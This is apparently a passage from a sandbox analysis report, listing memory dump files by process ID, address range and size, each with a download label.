                                                                      • memory/1728-207-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                        Filesize

                                                                        1.4MB

                                                                        Download

                                                                      • memory/1892-406-0x000000001B5A0000-0x000000001B882000-memory.dmp

                                                                        Filesize

                                                                        2.9MB

                                                                        Download

                                                                      • memory/1892-407-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

                                                                        Filesize

                                                                        32KB

                                                                        Download

                                                                      • memory/1904-181-0x00000000029E0000-0x00000000029E8000-memory.dmp

                                                                        Filesize

                                                                        32KB

                                                                        Download

                                                                      • memory/1904-180-0x000000001B750000-0x000000001BA32000-memory.dmp

                                                                        Filesize

                                                                        2.9MB

                                                                        Download

                                                                      • memory/2276-376-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                        Filesize

                                                                        1.4MB

                                                                        Download

                                                                      • memory/2440-65-0x00000000000E0000-0x00000000000FC000-memory.dmp

                                                                        Filesize

                                                                        112KB

                                                                        Download

                                                                      • memory/2440-68-0x00000000000E0000-0x00000000000FC000-memory.dmp

                                                                        Filesize

                                                                        112KB

                                                                        Download

                                                                      • memory/2440-69-0x00000000000E0000-0x00000000000FC000-memory.dmp

                                                                        Filesize

                                                                        112KB

                                                                        Download

                                                                      • memory/2440-63-0x00000000000E0000-0x00000000000FC000-memory.dmp

                                                                        Filesize

                                                                        112KB

                                                                        Download

                                                                      • memory/2440-64-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                        Download

                                                                      • memory/2596-173-0x000000001B680000-0x000000001B962000-memory.dmp

                                                                        Filesize

                                                                        2.9MB

                                                                        Download

                                                                      • memory/2596-174-0x0000000001E00000-0x0000000001E08000-memory.dmp

                                                                        Filesize

                                                                        32KB

                                                                        Download

                                                                      • memory/2936-401-0x0000000001D90000-0x0000000001D98000-memory.dmp

                                                                        Filesize

                                                                        32KB

                                                                        Download

                                                                      • memory/2960-266-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                        Filesize

                                                                        1.4MB

                                                                        Download

                                                                      • memory/3040-340-0x0000000000FB0000-0x0000000000FB1000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                        Download

                                                                      • memory/3040-361-0x0000000000FD0000-0x0000000000FD1000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                        Download

                                                                      • memory/3040-370-0x0000000000F60000-0x0000000000F61000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                        Download

                                                                      • memory/3040-374-0x00000000013C0000-0x00000000013C1000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                        Download

                                                                      • memory/3040-359-0x0000000000FA0000-0x0000000000FA1000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                        Download

                                                                      • memory/3040-356-0x0000000000FF0000-0x0000000000FF1000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                        Download

                                                                      • memory/3040-349-0x0000000001030000-0x0000000001031000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                        Download

                                                                      • memory/3040-342-0x0000000000FC0000-0x0000000000FC1000-memory.dmp

                                                                        Filesize

                                                                        4KB

                                                                        Download

                                                                      • memory/3040-327-0x0000000000EE0000-0x0000000000EF0000-memory.dmp

                                                                        Filesize

                                                                        64KB

                                                                        Download

                                                                      • memory/3040-321-0x0000000000E00000-0x0000000000E10000-memory.dmp

                                                                        Filesize

                                                                        64KB

                                                                        Download